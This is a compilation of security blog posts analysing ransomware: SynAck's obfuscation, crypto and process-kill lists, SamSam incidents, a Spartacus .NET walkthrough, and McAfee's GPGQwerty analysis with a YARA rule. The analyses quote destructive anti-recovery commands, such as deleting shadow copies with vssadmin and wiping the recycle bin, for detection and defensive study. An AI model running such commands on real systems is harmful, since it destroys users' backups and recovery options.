To complicate the malware analysts’ task, malware developers often use custom PE packers to protect the original code of the Trojan executable. Most packers of this type, however, are effortlessly unpacked to reveal the original unchanged Trojan PE file that’s suitable for analysis.

This, however, is not the case with SynAck. The Trojan executable is not packed; instead, it is thoroughly obfuscated prior to compilation. As a result, the task of reverse engineering is considerably more complicated with SynAck than it is with other recent ransomware strains.

The control flow of the Trojan executable is convoluted. Most of the CALLs are indirect, and the destination address is calculated by arithmetic operation from two DWORD constants.

All of the WinAPI function addresses are imported dynamically by parsing the exports of system DLLs and calculating a CRC32-based hash of the function name. This in itself is neither new nor particularly difficult to analyze. However, the developers of SynAck further complicated this approach by obscuring both the address of the procedure that retrieves the API function address, and the target hash value.

Let’s illustrate in detail how SynAck calls WinAPI functions. Consider the following piece of disassembly:

This code takes the DWORD located at 403b13, subtracts the constant 78f5ec4d, with the result 403ad0, and calls the procedure at this address.

This procedure pushes two constants (N1 = ffffffff877bbca1 and N2 = 2f399204) onto the stack and passes the execution to the procedure at 403680 which will calculate the result of N1 xor N2 = a8422ea5.

This value is the hash of the API function name that SynAck wants to call. The procedure 403680 will then find the address of this function by parsing the export tables of system DLLs, calculating the hash of each function name and comparing it to the value a8422ea5. When this API function address is found, SynAck will pass the execution to this address.

Notice that instead of a simple CALL in the image above it uses the instructions PUSH + RET which is another attempt to complicate analysis. The developers of SynAck use different instruction combinations instead of CALL when calling WinAPI functions:

push reg
jmp reg
mov [rsp-var], reg
jmp qword ptr [rsp-var]


To counter these attempts by the malware developers, we created an IDAPython script that automatically parses the code, extracts the addresses of all intermediate procedures, extracts the constants and calculates the hashes of the WinAPI functions that the malware wants to import.

We then calculated the hash values of the functions exported from Windows system DLLs and matched them against the values required by SynAck. The result was a list showing which hash value corresponds to which API function.

Part of the list of API functions imported by SynAck and their hashes

Our script then uses this list to save comments in the IDA database to indicate which API is going to be called by the Trojan. Here is the code from the example above after deobfuscation.

Disassembly screen – note the comment with the target API function name

Hex-Rays decompilation screen – again, the API function names are recognized

Language check

At an early stage of execution the Trojan performs a check to find out whether it has been launched on a PC from a certain list of countries. To do this, it lists all the keyboard layouts installed on the victim’s PC and checks against a list hardcoded into the malware body. If it finds a match, SynAck sleeps for 300 seconds and then just calls ExitProcess to prevent encryption of files belonging to a victim from these countries.

Part of the procedure that stops the Trojan if the language check is not passed

Part of the procedure that checks the keyboard layouts on the infected PC

Directory name validation

Shortly after the language check, which can be considered fairly common among modern ransomware, SynAck performs a check on the directory where its executable is started from. If there’s an attempt to launch it from an ‘incorrect’ directory, the Trojan won’t proceed and will just exit instead. This measure has been added by the malware developers to counter automatic sandbox analysis.

As with API imports, the Trojan doesn’t store the strings it wants to check; instead it stores their hashes – a tactic that hinders efforts to find the original strings.

SynAck contains nine hashes; we have been able to brute-force two of them:

0x05f9053d == hash("output")
0x2cd2f8e2 == hash("plugins")

In the process we found a lot of collisions (gibberish strings that give the same hash value as the meaningful ones).

Cryptographic scheme

Like other ransomware, SynAck uses a combination of symmetric and asymmetric encryption algorithms. At the core of the SynAck algorithm lies the hybrid ECIES scheme. It is composed of ‘building blocks’ which interact with each other: ENC (symmetric encryption algorithm), KDF (key derivation function), and MAC (message authentication code). The ECIES scheme can be implemented using different building blocks. To calculate a key for the symmetric algorithm ENC, this scheme employs the ECDH protocol (Diffie-Hellman over a chosen elliptic curve).

The developers of this Trojan chose the following implementation:


KDF: PBKDF2-SHA1 with one iteration


ECDH curve: standard NIST elliptic curve secp192r1


This is the function that implements the ECIES scheme in the SynAck sample.

Input: plaintext, input_public_key

Output: ciphertext, ecies_public_key, MAC

  1. The Trojan generates a pair of asymmetric keys: ecies_private_key and ecies_public_key;
  2. Using the generated ecies_private_key and input_public_key the Trojan calculates the shared secret according to the Diffie-Hellman protocol on an elliptic curve:
ecies_shared_secret = ECDH(ecies_private_key, input_public_key)
  1. Using the PBKDF2-SHA1 function with one iteration, the Trojan derives two byte arrays, key_enc and key_mac, from ecies_shared_secret. The size of key_enc is equal to the size of the plaintext;
  2. The plaintext is XORed byte to byte with the key_enc;
  3. The Trojan calculates the MAC (message authentication code) of the obtained ciphertext using the algorithm HMAC-SHA1 with key_mac as the key.


At the first step the Trojan generates a pair of private and public keys: the private key (session_private_key) is a 192-bit random number and the public key (session_public_key) is a point on the standard NIST elliptic curve secp192r1.

Then the Trojan gathers some unique information such as computer and user names, OS version info, unique infection ID, session private key and some random data and encrypts it using a randomly generated 256-bit AES key. The encrypted data is saved as the encrypted_unique_data buffer.

To encrypt the AES key, the Trojan uses the ECIES-XOR-HMAC-SHA1 function (see description above; hereafter referred to as the ECIES function). SynAck passes the AES key as the plaintext parameter and the hardcoded cybercriminal’s master_public_key as input_public_key. The field encrypted_aes_key contains the ciphertext returned by the function, public_key_n is the ECIES public key and message_authentication_code is the MAC.

At the next step the Trojan forms the structure cipher_info.

struct cipher_info
uint8_t encrypted_unique_data[240];
uint8_t public_key_n[49];
uint8_t encrypted_aes_key[44];
uint8_t message_authentication_code[20];

It is shown in the image below.

Encrypted initialization information

This data is then encoded in base64 and written into the ransom note.

Ransom note

As we can see, the criminals ask the victim to include this encoded text in their message.

File encryption

The content of each file is encrypted by the AES-256-ECB algorithm with a randomly generated key. After encryption, the Trojan forms a structure containing information such as the encryption label 0xA4EF5C91, the used AES key, encrypted chunk size and the original file name. This information can be represented as a structure:

struct encryption_info
uint32_t label = 0xA4EF5C91;
uint8_t aes_key[32];
uint32_t encrypted_chunk_size;
uint32_t reserved;
uint8_t original_name_buffer[522];

The Trojan then calls the ECIES function and passes the encryption_info structure as the plaintext and the previously generated session_public_key as the input_public_key. The result returned by this function is saved into a structure which we dubbed file_service_structure. The field encrypted_file_info contains the ciphertext returned by the function, ecc_file_key_public is the ECIES public key and message_authentication_code is the MAC.

struct file_service_structure
uint8_t ecc_file_key_public[49];
encryption_info encrypted_file_info;
uint8_t message_authentication_code[20];

This structure is written to the end of the encrypted file. This results in an encrypted file having the following structure:

struct encrypted_file
uint8_t encrypted_data[file_size - file_size % AES_BLOCK_SIZE];
uint8_t original_trailer[file_size % AES_BLOCK_SIZE];
uint64_t encryption_label = 0x65CE3D204A93A12F;
uint32_t infection_id;
uint32_t service_structure_size;
file_service_structure service_info;

The encrypted file structure is shown in the image below.

Encrypted file structure

After encryption the files will have randomly generated extensions.

Directory after encryption

Other features

Termination of processes and services

Prior to file encryption, SynAck enumerates all running processes and all services and checks the hashes of their names against two lists of hardcoded hash values (several hundred combined). If it finds a match, the Trojan will attempt to kill the process (using the TerminateProcess API function) or to stop the service (using ControlService with the parameter SERVICE_CONTROL_STOP).

To find out which processes it wants to terminate and which services to stop, we brute-forced the hashes from the Trojan body. Below are some of the results.

Processes Services
Hash Name Hash Name
0x9a130164 dns.exe 0x11216a38 vss
0xf79b0775 lua.exe 0xe3f1f130 mysql
0x6475ad3c mmc.exe 0xc82cea8d qbvss
0xe107acf0 php.exe 0xebcd4079 sesvc
0xf7f811c4 vds.exe 0xf3d0e358 vmvss
0xcf96a066 lync.exe 0x31c3fbb6 wmsvc
0x167f833f nssm.exe 0x716f1a42 w3svc
0x255c7041 ssms.exe 0xa6332453 memtas
0xbdcc75a9 w3wp.exe 0x82953a7a mepocs
0x410de6a4 excel.exe
0x9197b633 httpd.exe
0x83ddb55a ilsvc.exe
0xb27761ed javaw.exe
0xfd8b9308 melsc.exe
0xa105f60b memis.exe
0x10e94bcc memta.exe
0xb8de9e34 mepoc.exe
0xeaa98593 monad.exe
0x67181e9b mqsvc.exe
0xd6863409 msoia.exe
0x5fcab0fe named.exe
0x7d171368 qbw32.exe
0x7216db84 skype.exe
0xd2f6ce06 steam.exe
0x68906b65 store.exe
0x6d6daa28 vksts.exe
0x33cc148e vssvc.exe
0x26731ae9 conime.exe
0x76384ffe fdhost.exe
0x8cc08bd7 mepopc.exe
0x2e883bd5 metray.exe
0xd1b5c8df mysqld.exe
0xd2831c37 python.exe
0xf7dc2e4e srvany.exe
0x8a37ebfa tabtip.exe

As we can see, SynAck seeks to stop programs related to virtual machines, office applications, script interpreters, database applications, backup systems, gaming applications and so on. It might be doing this to grant itself access to valuable files that could have been otherwise used by the running processes.

Clearing the event logs

To impede possible forensic analysis of an infected machine, SynAck clears the event logs stored by the system. To do so, it uses two approaches. For Windows versions prior to Vista, it enumerates the registry key SYSTEM\CurrentControlSet\Services\EventLog and uses OpenEventLog/ClearEventLog API functions. For more modern Windows versions, it uses the functions from EvtOpenChannelEnum/EvtNextChannelPath/EvtClearLog and from Wevtapi.dll.

Ransom note on logon screen

SynAck is also capable of adding a custom text to the Windows logon screen. It does this by modifying the LegalNoticeCaption and LegalNoticeText keys in the registry. As a result, before the user signs in to their account, Windows shows a message from the cybercriminals.

Windows logon screen with ransom text

Attack statistics

We have currently only observed several attacks in the USA, Kuwait, Germany, and Iran. This leads us to believe that this is targeted ransomware.

Detection verdicts




Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botch upgraded to their online banking system, which meant the Spanished owned bank had to shut down their online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than million customer accounts following a breach by hackers, US Sun Trust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US Saks, Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklist China's state-owned firm ZTE, warning UK telecom providers usage of ZTE's equipment could pose a national security risk. Interestingly BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russian of large-scale cyber-campaigns, aimed at compromising vast numbers of the Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated for the second year in a row that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware i.e. Zeus, TrickBot, Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturer IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers already had been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens to the door cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.


SamSam ransomware: what you need to know

SamSam ransomware is a custom infection used in targeted attacks, often deployed using a wide range of exploits or brute-force tactics. Based on our own run-ins with the infection, we’ve observed that attacks were made on targets via vulnerable JBoss host servers during a previous wave of SamSam attacks in 2016 and 2017.

In 2018, SamSam uses either vulnerabilities in remote desktop protocols (RDP), Java-based web servers, or file transfer protocol (FTP) servers to gain access to the victims’ network or brute force against weak passwords to obtain an initial foothold. From there, the ransomware “fun and games” begin for the authors. For everyone else, it’s chaos.

The ties that bind

A common thread tying all of these attacks together is the use of the word “sorry” in ransom notes, URLs, and even infected files. It’s made hundreds of thousands of dollars so far, and it’s caused no end of trouble in the US for cities like Atlanta.

Here’s what a typical ransom splash screen looks like:

samsam ransom

The ransom note is quite interesting, giving the option of randomly-selected file encryption (if you don’t pay the full amount). They’ll also unlock one file for free as a token of trust that they will give your files back after payment. It reads as follows:

What happened to your files?

All your files encrypted with RSA-2048 encryption, for more information search in Google “RSA encryption”

How to recover files?

RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key.

How to get private key?

You can get your private key in 3 easy steps:
1) You must send us 0.8 Bitcoin for each affected PC or 4.5 Bitcoins to receive all private keys for all affected PCs.
2) After you send us 0.8 Bitcoin, leave a comment on our site with this detail: just write your host name in your comment
3) We will reply to your comment with a decryption software, you should run it on your affected PC and all encrypted files will be recovered

With buying the first key you will find that we are honest

Ransomware authors rely on the victim viewing their odd code of “honesty” as important, or else nobody would dare to pay up.

I should also mention, before we go any further, that we do protect against this specific threat, which we detect as Ransom.Samas:

SamSam detection

The SamSam group have been making waves since late 2015, causing trouble in 2016, and starting to regularly increase the cost of their ransom in 2017. Colorado and Atlanta have both had run-ins with SamSam recently, as you may have seen from ongoing news coverage.

One would think SamSam has been around long enough for organizations to be able to deal with it effectively, but it’s still here, and still locking up machines in targeted attacks.

You can trace SamSam’s first2018 appearance in back to January. There’s “persistent” and then there’s SamSam.

January: Sorry, not sorry

Hospitals, city municipalities, and many more from Indiana to New Mexico were all struck down by SamSam in varying degrees of severity. A hospital in Indiana, in particular, was reduced to working with pen and paper in stormy weather. They decided to pay the ransom and get systems back up and running, given the cost of the fix was more than the ransom. This is an organization that had backups in place, unlike many other ransomware victims. All the same, by attacking a service offering life-saving treatment to patients, staff were left with few options.

Though you’ll find conflicting advice on paying the ransom, and while appreciating that every case is different, we generally advise not to do it. By handing over the cash, you’re giving the green light to the hackers to carry on doing it. If it works the first time, why not the second or third?

This is the already fraught situation healthcare professionals and departments responsible for day-to-day management of city services find themselves in as we head into February.

February: Slow traffic blues

In February, the Colorado Department of Transportation had to shut down 2,000 (non critical) systems as they, too, were hit by a SamSam outbreak. Bitcoin was once again what the hackers were after; the CDT decided that they weren’t going to pay up, but restore their backups instead.

March: Atlanta ransomware resurgent

All of the worst problems of SamSam effectively rolled into one large pile of misery for the city of Atlanta, who had a serious case of the SamSam blues:

They were faced with the prospect of paying $6,800 per machine to unlock the encrypted files, or a cool $51,000 to recover everything across all compromised computers. As to how the attackers got in, one researcher noted a potential EternalBlue route:

Regardless of the method used, the big problem here is that 10 days after initial infection, they were still struggling to get back to full strength, with no less than five out of 13 departments hit in the original malware blast. Just like the Indiana hospital staff were forced to use pen and paper, so too were law enforcement in Atlanta—and they also lost some police records in the bargain.

Note that three city council staffers had to work on a “clunky personal laptop.” So now we’re introducing personal machines onto a network dealing with potentially sensitive data, already hammered by opportunistic malware infections. One hopes that the machine had at least been checked for infections or potential vulnerabilities, but it would be surprising if the already busy IT staff checked if the employee had installed all security patches.

You could say the ransom was “only” $51,000—except the ransomware authors pulled the payment page and left Atlanta carrying the can. Ultimately, the SamSam outbreak cost the city of Atlanta a terrifying $2.6 million dollars to set a $50k infection right.

It isn’t just fixing some computers. There’s everything from forensics and insurance to extra staff and crisis comms to consider. This is the very real cost of attempting to recover from an infection—and that’s while trying to offer public-facing services potentially impacted by the attack.

Fighting ransomware

Ransomware may be experiencing a drop in popularity but make no mistake—the impact can be horrendous. As a reminder, here are some ways local governments and other organizations can fend off these attacks:

  • Backups are essential, and help to reduce some of the impact from a ransomware attack. A word of caution: your backups have to be logical and easy to implement if needed. All too often, organizations throw everything into a jumble of files and folders, with duplication galore and no real instructions as to where everything should go.
  • Staff training. It’s arguable that the automated systems in place should stop attacks long before reaching the human component of your network, but giving staff a crash course in security basics is always a good idea.
  • Spam filtering for email-based attacks (fake PDF invoices, booby-trapped Word documents insisting you enable Macros and the like).
  • Disable unnecessary exposed services facing the Internet, a time-honored way in for ransomware infections everywhere.
  • Change default/easy-to-guess passwords on all of your systems and services (not just the “important” ones, because ultimately someone will find their way in on the supposedly unimportant ones instead).
  • Choose your vendors wisely.

SamSam: not gone, and not forgotten

Money makes the world go round, and for SamSam their currency of choice is Bitcoin. Make no mistake, business is good; they’re estimated to have racked up around $850,000 in profit and they show no sign of slowing down. Consider that their estimated $850k profit is still nowhere near the cost of recovery for the City of Atlanta alone, and then take into account how much cleanup has cost for everyone else affected so far.

No matter your reason for being online, and regardless of which industry you operate in, I think we can all agree warding off an attack such as the ones above should be foremost in your mind when allocating a budget to security threats. SamSam isn’t going away anytime soon, and unfortunately the same can be said for other infections waiting to strike. It only takes one moment of inattentiveness, and you could be faced with some difficult decisions indeed.

Thanks to Marcelo for screenshots and additional information.

The post SamSam ransomware: what you need to know appeared first on Malwarebytes Labs.

Spartacus ransomware: introduction to a strain of unsophisticated malware

Spartacus ransomware is a new sample that has been circulating in 2018. Written in C#, the original sample is obfuscated, which we will go over as we extract it to its readable state.

Spartacus is a relatively straight-forward ransomware sample and uses some similar techniques and code to others we have seen in the past, such as ShiOne, Blackheart, and Satyr. However, there is no sure relationship between these samples and the actors. I mention it mainly to show that they share similar functionality and are basic in form.

In the case of Satyr and Blackheart, the code is nearly identical, with Spartacus following almost the same code flow with some modifications. If I were to make an assumption, I would say they are either the same actor or the actors for each of them used the same code. But again, there are no facts to prove this as of now.

In general, what we notice is that there is a string of these .NET ransomware popping up, all of them more or less the same or similar. It is just an easy form of ransomware that criminals are creating, as it obviously does not take much time or thought to make.

There is nothing impressive about them, in fact just the opposite. I would say they are boring at best. So why are we writing about one of them? The analysis of Spartacus can essentially be used as a base knowledge and reference for anyone analyzing variants of these basic .NET ransomware that they may come across in the future.

The two take aways from this article will be understanding the code in detail, and understanding how to get an obfuscated .NET sample into a readable state.


Before we begin, I want to mention one characteristic about Spartacus’ encryption method. Spartacus starts by generating a unique key for encryption done with the Rijndael algorithm. (The Rijndael algorithm is a version of AES.)

This key is saved and used to encrypt every single file, meaning that two identical files will have the same cipher-text. The AES key is encrypted with a RSA key embedded in the file. The cipher-text is encoded and shown to the user in the ransom note.

The fact that the RSA key is statically embedded in the ransomware implies that the private key exists on the server side of the ransomware author’s system. Thus, all AES keys from all victims of this particular strain can be decrypted using this one key if it is ever leaked.

As this ransomware is not extremely complex, we will go straight to the deep technical analysis and code walkthrough.


When we first open the sample of Spartacus in ILSpy, we see this:

The code of the functions is not visible and as you can see, everything is obfuscated. In these scenarios, I like to use a tool called de4dot. It will process the file and output a clean readable version. The -r flag is where you set the directory, which contains the obfuscated .NET sample.

This gives us the clean version, which we will be using for our analysis going forward.


Let’s begin with the Main function shown below.

It starts by making sure there is only one instance of this malware running on the system. It does so by the CheckRunProgram function, which, among other things, creates a mutex and makes sure it is unique.

After this check is complete, it executes smethod_3 in a thread.

Before the smethod_3 begins, the constructor for this class gets automatically called now and sets up all the private members (variables), which include all special folders to search and encrypt. It also generates the AES key, which is unique to the victim, using the KeyGenerator.GetUniqueKey(133) function. The special folders can be viewed below and will be referenced throughout the ransomware to begin folder traversing.

The keygen function as I mentioned is GetUniqueKey(), the details of which are below. Essentially, it just creates a series of cryptographically strong random numbers using the RNGCryptoServiceProvider.GetNonZeroBytes API function. It then uses that series of random numbers as indexes to the character set
array = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890” to build a unique string of characters. This is the AES key, which will encrypt all files going forward.

Now that the constructor of the class has been initiated, let’s take a look at the smethod_3 function that was called.

This function iterates the list of special folders, which was generated in the constructor and begins its recursive traversal encrypting every file in the folders using the smethod_6 function. One thing I will note here is that the encryption loop does not discriminate file types or special files. It will encrypt everything it comes across. Also, you can see smethod_1 being called. This may be a leftover mistake of the programmer, as its output is not used anywhere in the program and is called later on when it’s time to display the encrypted key to the user.

As I mentioned, the smethod_6 function is the one doing all the encryption, but the smethod_5 function is the recursive function that will dig into each sub folder of whatever location it starts at, calling smethod_6 on each iteration to encrypt the files in that sub folder.

As you can see, it calls itself so that it will eventually cover every single sub folder. Then it calls smethod_6 to do the actual encryption, looping through every file in that folder.

This method iterates all files in the current folder. The only stipulation is that the file is not already encrypted. This is the portion here, which simply makes sure the extension is not already .Spartacus:

if (Path.GetExtension(text) == ".Spartacus")

If this check passes, it calls smethod_7, which does the file content rewriting with the encrypted version.

The function calls smethod_0, which encrypts the original file data, and then the next two lines write the encrypted data into the file and rename it with the .Spartacus extension. A quick note: Another sign that every single file is encrypted with the same key is that this ransomware does not write the encrypted AES key into the file, which we see in other ransomware that perform unique file encryptions.

As you can see here, it uses the Rijndael method—AES using ECB mode. The key that was generated in the constructor is hashed with MD5, and that is actually what is used as the key itself.

Now we have gone through the whole process for file encryption on the main file system, through all the sub functions called inside of the parent function smethod_3.

Let’s go back to the main function now to the next line, which calls smethod_4():

smethod_4 basically performs exactly the same set of recursive function calls as we saw in smethod_3, however, rather than looping through special folders, it is now iterating over all logical drives that are attached to the system. So all external or mapped drives will be encrypted as well.

We do not need to go through all these details now as we have already covered their functionality, being that they are identical to the earlier function calls. The only thing I will mention is that smethod_6 is called twice. This is done most likely to speed up the encryption by having it run on two threads.

Back to main: the next and final important function call is:

Application.Run(new Form1());

This will display the ransom note to the user and show the encrypted AES key in the ransom note.

It starts by calling smethod_1(). As I mentioned above, this simply takes the AES key, which was generated at the beginning and encrypts it using the hard-coded public RSA key.

public static string smethod_1()
 return Convert.ToBase64String(Class1.smethod_2("<RSAKeyValue><Modulus>xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>", Encoding.UTF8.GetBytes(Class2.smethod_0())));

The RSA key is hard coded and embedded into the ransomware, which means that the author has generated the private key in advance on his side.

It then iterates all drives and writes the ransom note there. Finally, it opens the ransom note displaying the message and the RSA-encrypted AES key, which will be used by the victim in order to decrypt.

After all of this, the final thing it does is call smethod_0, which deletes shadow volumes in order to prevent the user from using as a Windows restore point.

This ransomware is purely offline in that there are no network communications back to the author or any C2 server. The ransomware author does not know who he has infected until they email him with their personal ID, which is the AES key. This also means that the decryption tool the author will send is likely embedded with the AES key, which unfortunately will be unique to the specific victim.

There is nothing special or innovative about this sample, but that does not mean it is not dangerous. It will still do its job—at the moment there is no decryptor for this. The only slight possibility to save yourself if you realize you are being hit with this malware is to perform a process memory dump, in which case there is a slight possibility of extracting the keys from memory.

In general, it is always a good idea to perform a memory dump of any malware on your system before killing the process in the slight chance that some keys can be recovered.

The post Spartacus ransomware: introduction to a strain of unsophisticated malware appeared first on Malwarebytes Labs.

Ransomware reminders force focus on prevention and planning

Ransomware reared its ugly head again recently, with some stark reminders that it’s still a serious business risk. A household name suffered what seemed a major infection, while it emerged that many victims never get their data back.

Last week, Boeing narrowly avoided a tailspin after a senior engineer alerted colleagues of a WannaCry infection. It appeared to threaten vital aircraft production systems, though after an investigation, Boeing described it as a “limited intrusion”.

Financial impact of ransomware

Boeing’s experience shows that companies face a financial impact beyond paying a ransom if criminals encrypt their data. Ransomware infections can also cause huge disruption as IT teams scramble to lock down the source and prevent further spread. At the time of writing, the city of Atlanta, Georgia was still restoring systems 10 days after an attack of the SamSam ransomware. The incident reportedly affected at least five municipal departments, disabling some city services and forcing others to revert to paper records.

According to SANS, in the past six months at least three other US companies suffered work stoppages due to WannaCry infections. Last year, more than 80 organisations in the UK National Health Service shut down their computers. All told, WannaCry led to 20,000 cancelled appointments, 600 GP surgeries using pen and paper, and five hospitals diverting ambulances.

Criminals don’t give money-back guarantees

Facing similar scenarios, many organisations might choose to pay up rather than risk prolonged disruption, lost revenue or angry customers. But recent surveys might cause them to pause before parting with their cash. A report from CyberEdge found that 51 per cent of ransomware victims who paid the ransom never got their files back. A separate study from SentinelOne had similarly depressing news. It found that 45 per cent of US companies infected last year paid at least one ransom, but only 26 per cent of them had their files unlocked afterwards.

BH Consulting advises victims not to pay the ransom. As the surveys above tell us, payment is no guarantee of recovering files. “Criminals prove to be untrustworthy” was The Register’s snarky but accurate take on the story. Paying also encourages criminals that a business is an easy mark. TechRepublic noted that 73 per cent of organisations that paid the ransom were targeted and attacked again.

Take preventative steps

The key with ransomware is to prevent it before it spreads. Last year, BH Consulting published a guide to preventing ransomware infections just as some of the biggest outbreaks took hold. The document includes technical and business-process steps to avoid further infection. Given the latest developments, now seems like a good time to revisit those recommendations. They include:

  • Review and regularly test backup processes – still the most effective way to recover
  • Establish a baseline of normal network behaviour – unusual activity will be easier to spot
  • Segment your network – this will limit the ability of worms and other infections to spread
  • Implement ad blocking – to stop compromised adverts from delivering malware
  • Review security of mobile devices – because ransomware is migrating to mobiles

You can download the free guide here. Another useful resource is the NoMoreRansom initiative, which is a partnership between law enforcement and industry. It provides free tools to decrypt  many common types of ransomware. BH Consulting is among the partners from across the private and public sectors.

Let’s wrap up with some encouraging news. The CyberEdge report found that just 13 per cent of companies that refused to pay lost their files. In other words, 87 per cent subsequently recovered their data. It bears repeating: prevention, not payment, is a better way to keep ransomware out of your business.

The post Ransomware reminders force focus on prevention and planning appeared first on BH Consulting.

Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard

McAfee Labs has recently observed a new variant of ransomware that relies on the open-source program GNU Privacy Guard (GnuPG) to encrypt data. GnuPG is a hybrid-encryption software program that uses a combination of conventional symmetric-key cryptography for speed and public-key cryptography to ease the secure key exchange. Although ransomware using GnuPG to encrypt files is not unique, it is uncommon.

We analyzed the following SHA-256 hashes of the malware GPGQwerty:

  • 2762a7eadb782d8a404ad033144954384be3ed11e9714c468c99f0d3df644ef5
  • 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502
  • f5cd435ea9a1c9b7ec374ccbd08cc6c4ea866bcdc438ea8f1523251966c6e88b

We found these hashes need many support files for successful execution. The three files themselves will not encrypt anything. GPGQwerty consists of a bundle of files that runs together to encrypt a victim’s machine. The bundle comprises ten files:

This ransomware was first seen at the beginning of March. Generally, this type of malware spreads by spam email, malicious attachments, exploits, or fraudulent downloads. The binary 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502 was spotted in the wild at hxxp://; it may be part of a drive-by download strategy or was hosted on a legitimate site.

Key.bat, run.js, and find.exe are three files that play a vital role in the encryption process. The infection process follows this path:


The binary find.exe has eight sections and the raw size of its .bss section is zero.

It also has an unusual time and date stamp:

The file includes malicious thread local storage (TLS) callbacks as an anti-analysis trick. Generally, this technique allows executable files to include malicious TLS callback functions to run prior to the AddressOfEntryPoint field (the normal execution point of a binary) in the executable header.

The action starts with the execution of the batch file key.bat. It imports the key and launches find.exe on the victim’s machine by executing the JavaScript run.js. The contents of the batch and JavaScript files are shown in the following snippet:

This ransomware kills some selected running tasks using command-line utility taskkill. This command has options to kill a task or process either by using the process ID or the image filename. In the following snippet, we see it terminating some processes forcefully by using their image names.

The ransomware tries to encrypt data using GnuPG (gpg.exe). The malware appends the extension .qwerty to the encrypted files:

The malware overwrites the original files using shred.exe:

After encryption, the ransomware allots a unique ID that identifies each victim. It also creates a .txt file that states all files on the computer have been locked and the victim must pay to decrypt the files.

GPGQwerty deletes the recycle bin using the Windows utility del:

Using the command “vssadmin.exe Delete Shadows /All /Quiet,” the ransomware silently removes the volume shadow copies (vssadmin.exe, wmic.exe) from the target’s system, thus preventing the victim from restoring the encrypted files. It also deletes backup catalogs (wbadmin.exe) and disables automatic repair at boot time (bcdedit.exe):

Finally, it creates the ransom note readme_decrypt.txt in each folder that holds an encrypted file. The ransom note gives instructions to communicate with an email address within 72 hours to arrange payment.

This Yara rule detects GPGQwerty:

rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty



author = “McAfee Labs”

description = “Detect GPGQwerty ransomware”


$a = “gpg.exe –recipient qwerty  -o”

$b = “%s%s.%d.qwerty”

$c = “del /Q /F /S %s$recycle.bin”

$d = “”


          all of them



McAfee advises all users to keep their antimalware products up to date. McAfee products detect this malware as Ransomware-GKF! [Partial hash] with DAT Versions 8826 and later. For more on combating ransomware, visit

The post Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard appeared first on McAfee Blogs.

What’s New in the World of Ransomware?

Ransomware, the type of malware that can infect your computers and devices, lock you out of your own files, and demand a ransom to unlock them, is growing rapidly in both incidents and sophistication. In some cases, ransomware is even used as a cover to distract from more serious attacks, so it’s important for everyone to learn what’s new with this persistent threat.

First, it’s clear that these kind of attacks spell success for the malware authors, who have ramped up their distribution. McAfee saw a 59% increase in ransomware in 2017 over the previous year, and a 35% spike in the fourth quarter alone. This is despite the fact that only half of victims who chose to pay the ransom actually recover their files, according to a recent study.

Still, they are clearly profitable for the cybercriminals who usually demand payment in hard-to-trace cryptocurrencies, such as Bitcoin. The fact that cryptocurrencies spiked in value last year, with Bitcoin showing a 10-fold increase alone, is probably another factor. These attacks were estimated to cost victims up to $5 billion globally in 2017, including data loss, downtime and disruption.

What’s more, in order to make money today’s thieves don’t even have to be tech savvy. Ransomware marketplaces have sprouted up online, offering malware strains for any would-be cybercrook, and generating extra profit for the malware authors, who often ask for a cut in the ransom proceeds.

This favorable environment has led to malware innovation. Although computers have been the traditional targets, cybercriminals have recently set their sights on the huge mobile market. Take, for instance, the DoubleLocker malware strain aimed at Android devices. It not only encrypted users’ data, but also changed their PIN codes, locking them out of their devices all together. This malware spread as a phony Adobe Flash Player update.

We have also seen the rise of so-called “pseudo ransomware”, like NotPetya. This malware strain used ransomware as a cover to do even more damage to victims’ data, presumably to cause disruption. Even more concerning was the way it spread— originally planted in accounting software, it could infect other computers without tricking users into downloading it, and evading known ransomware detection. Although this malware displayed a message demanding ransom in Bitcoin, there was no identifying number to track payments and the data was so damaged that there is no way to actually restore files.

Given the growing threats that ransomware and its disruptive variants pose, you need to know what to look out for, and how to protect yourself.

Follow these important tips to steer clear of ransomware:

